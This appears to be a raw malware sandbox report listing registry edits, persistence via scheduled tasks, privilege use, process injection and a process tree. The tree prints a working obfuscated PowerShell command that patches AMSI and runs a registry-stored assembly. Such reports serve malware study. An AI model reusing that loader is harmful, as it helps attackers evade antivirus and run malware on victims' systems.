Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000000000001000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000a343014af18db012eaf244bb418db01c9d47665e565db0114000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4212	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2404	schtasks.exe
6404	SCHTASKS.exe
5672	schtasks.exe
8488	schtasks.exe
8340	schtasks.exe
1516	schtasks.exe
2144	schtasks.exe
3900	schtasks.exe
6996	schtasks.exe
6524	schtasks.exe
8480	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4436	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4784	gem1.exe
4784	gem1.exe
4804	chrome.exe
4804	chrome.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
3716	build.exe
1380	chrome.exe
1380	chrome.exe
4972	gem2.exe
5880	powershell.exe
5880	powershell.exe
5880	powershell.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
5228	dialer.exe
5228	dialer.exe
4972	gem2.exe
4972	gem2.exe
4972	gem2.exe
5540	Lightshot.exe
5228	dialer.exe
5228	dialer.exe
5552	powershell.exe
5552	powershell.exe
5552	powershell.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5552	powershell.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe
5228	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2568	7zFM.exe
2496	chrome.exe
4076	Client-base.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2568	7zFM.exe
Token: 35	2568	7zFM.exe
Token: SeSecurityPrivilege	2568	7zFM.exe
Token: SeDebugPrivilege	880	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	3080	._cache_Synaptics.exe
Token: SeDebugPrivilege	4076	Client-base.exe
Token: SeDebugPrivilege	3704	voidware_loader.exe
Token: SeDebugPrivilege	3024	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	3288	DirectX111.exe
Token: SeDebugPrivilege	4784	gem1.exe
Token: SeImpersonatePrivilege	4784	gem1.exe
Token: SeDebugPrivilege	4204	gem1.exe
Token: SeImpersonatePrivilege	4204	gem1.exe
Token: SeShutdownPrivilege	4804	chrome.exe
Token: SeCreatePagefilePrivilege	4804	chrome.exe
Token: SeDebugPrivilege	3716	build.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeDebugPrivilege	5880	powershell.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeDebugPrivilege	5228	dialer.exe
Token: SeShutdownPrivilege	5184	powercfg.exe
Token: SeCreatePagefilePrivilege	5184	powercfg.exe
Token: SeShutdownPrivilege	5176	powercfg.exe
Token: SeCreatePagefilePrivilege	5176	powercfg.exe
Token: SeShutdownPrivilege	5192	powercfg.exe
Token: SeCreatePagefilePrivilege	5192	powercfg.exe
Token: SeShutdownPrivilege	5200	powercfg.exe
Token: SeCreatePagefilePrivilege	5200	powercfg.exe
Token: SeDebugPrivilege	5552	powershell.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeDebugPrivilege	5272	dialer.exe
Token: SeShutdownPrivilege	5312	powercfg.exe
Token: SeCreatePagefilePrivilege	5312	powercfg.exe
Token: SeShutdownPrivilege	1728	powercfg.exe
Token: SeCreatePagefilePrivilege	1728	powercfg.exe
Token: SeLockMemoryPrivilege	1576	dialer.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeShutdownPrivilege	5196	powercfg.exe
Token: SeCreatePagefilePrivilege	5196	powercfg.exe
Token: SeShutdownPrivilege	5404	powercfg.exe
Token: SeCreatePagefilePrivilege	5404	powercfg.exe
Token: SeShutdownPrivilege	1380	chrome.exe
Token: SeCreatePagefilePrivilege	1380	chrome.exe
Token: SeAssignPrimaryTokenPrivilege	2628	svchost.exe
Token: SeIncreaseQuotaPrivilege	2628	svchost.exe
Token: SeSecurityPrivilege	2628	svchost.exe
Token: SeTakeOwnershipPrivilege	2628	svchost.exe
Token: SeLoadDriverPrivilege	2628	svchost.exe
Token: SeSystemtimePrivilege	2628	svchost.exe
Token: SeBackupPrivilege	2628	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2568	7zFM.exe
2568	7zFM.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
4804	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe
1380	chrome.exe

Suspicious use of SetWindowsHookEx 43 IoCs

pid	Process
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4436	EXCEL.EXE
4076	Client-base.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe
5820	firefox.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3308	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3116 wrote to memory of 880	3116	New Text Document mod.exe	81
PID 3116 wrote to memory of 880	3116	New Text Document mod.exe	81
PID 3116 wrote to memory of 2364	3116	New Text Document mod.exe	83
PID 3116 wrote to memory of 2364	3116	New Text Document mod.exe	83
PID 3116 wrote to memory of 2364	3116	New Text Document mod.exe	83
PID 2364 wrote to memory of 3080	2364	Synaptics.exe	84
PID 2364 wrote to memory of 3080	2364	Synaptics.exe	84
PID 880 wrote to memory of 4076	880	._cache_New Text Document mod.exe	89
PID 880 wrote to memory of 4076	880	._cache_New Text Document mod.exe	89
PID 880 wrote to memory of 3716	880	._cache_New Text Document mod.exe	92
PID 880 wrote to memory of 3716	880	._cache_New Text Document mod.exe	92
PID 880 wrote to memory of 3716	880	._cache_New Text Document mod.exe	92
PID 4076 wrote to memory of 2404	4076	Client-base.exe	93
PID 4076 wrote to memory of 2404	4076	Client-base.exe	93
PID 3080 wrote to memory of 3704	3080	._cache_Synaptics.exe	95
PID 3080 wrote to memory of 3704	3080	._cache_Synaptics.exe	95
PID 3228 wrote to memory of 3024	3228	New Text Document mod.exe	97
PID 3228 wrote to memory of 3024	3228	New Text Document mod.exe	97
PID 3704 wrote to memory of 1516	3704	voidware_loader.exe	99
PID 3704 wrote to memory of 1516	3704	voidware_loader.exe	99
PID 3704 wrote to memory of 3288	3704	voidware_loader.exe	101
PID 3704 wrote to memory of 3288	3704	voidware_loader.exe	101
PID 3288 wrote to memory of 2144	3288	DirectX111.exe	102
PID 3288 wrote to memory of 2144	3288	DirectX111.exe	102
PID 3080 wrote to memory of 4972	3080	._cache_Synaptics.exe	104
PID 3080 wrote to memory of 4972	3080	._cache_Synaptics.exe	104
PID 3024 wrote to memory of 1412	3024	._cache_New Text Document mod.exe	105
PID 3024 wrote to memory of 1412	3024	._cache_New Text Document mod.exe	105
PID 3024 wrote to memory of 1412	3024	._cache_New Text Document mod.exe	105
PID 1412 wrote to memory of 928	1412	gem1.exe	107
PID 1412 wrote to memory of 928	1412	gem1.exe	107
PID 1412 wrote to memory of 928	1412	gem1.exe	107
PID 1412 wrote to memory of 4256	1412	gem1.exe	108
PID 1412 wrote to memory of 4256	1412	gem1.exe	108
PID 1412 wrote to memory of 4256	1412	gem1.exe	108
PID 1412 wrote to memory of 4512	1412	gem1.exe	109
PID 1412 wrote to memory of 4512	1412	gem1.exe	109
PID 1412 wrote to memory of 4512	1412	gem1.exe	109
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4784	1412	gem1.exe	110
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 1412 wrote to memory of 4204	1412	gem1.exe	111
PID 4804 wrote to memory of 3016	4804	chrome.exe	117
PID 4804 wrote to memory of 3016	4804	chrome.exe	117
PID 4804 wrote to memory of 4984	4804	chrome.exe	118
PID 4804 wrote to memory of 4984	4804	chrome.exe	118
PID 4804 wrote to memory of 4984	4804	chrome.exe	118
PID 4804 wrote to memory of 4984	4804	chrome.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:444

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LropDAXAVyyN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EXdXpxXLvDyohY,[Parameter(Position=1)][Type]$DzdSLsoOYG)$yfawsLOHJWD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+'e'+[Char](99)+''+'t'+'e'+'d'+'D'+'e'+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+'e'+[Char](84)+'y'+'p'+''+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+'iC'+[Char](108)+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'ss',[MulticastDelegate]);$yfawsLOHJWD.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'pe'+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$EXdXpxXLvDyohY).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');$yfawsLOHJWD.DefineMethod(''+[Char](73)+''+'n'+'vok'+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+'i'+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+'S'+'lo'+'t'+','+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+'a'+'l'+'',$DzdSLsoOYG,$EXdXpxXLvDyohY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $yfawsLOHJWD.CreateType();}$SWbNxLdTEOINF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'of'+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$dRaGzFdPzMlMva=$SWbNxLdTEOINF.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+'ro'+[Char](99)+'A'+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'t'+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PVLCjpLyCuNUmidiDgh=LropDAXAVyyN @([String])([IntPtr]);$bZokRpHXVOkQRuUZhtqtkk=LropDAXAVyyN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SWnALJhIPvS=$SWbNxLdTEOINF.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+'ne'+[Char](108)+'3'+[Char](50)+'.'+'d'+''+[Char](108)+''+'l'+'')));$qhMYIzLVImFBHx=$dRaGzFdPzMlMva.Invoke($Null,@([Object]$SWnALJhIPvS,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'ibr'+'a'+''+[Char](114)+''+[Char](121)+'A')));$MwIxRCHnKbjueYQXp=$dRaGzFdPzMlMva.Invoke($Null,@([Object]$SWnALJhIPvS,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$wSEunBQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qhMYIzLVImFBHx,$PVLCjpLyCuNUmidiDgh).Invoke('a'+[Char](109)+'s'+'i'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$LlUzeRysDTSsTFYpW=$dRaGzFdPzMlMva.Invoke($Null,@([Object]$wSEunBQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$PZrcDkywGf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwIxRCHnKbjueYQXp,$bZokRpHXVOkQRuUZhtqtkk).Invoke($LlUzeRysDTSsTFYpW,[uint32]8,4,[ref]$PZrcDkywGf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LlUzeRysDTSsTFYpW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwIxRCHnKbjueYQXp,$bZokRpHXVOkQRuUZhtqtkk).Invoke($LlUzeRysDTSsTFYpW,[uint32]8,0x20,[ref]$PZrcDkywGf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'L'+'M'+[Char](88)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1284

C:\Windows\System32\svchost.exe
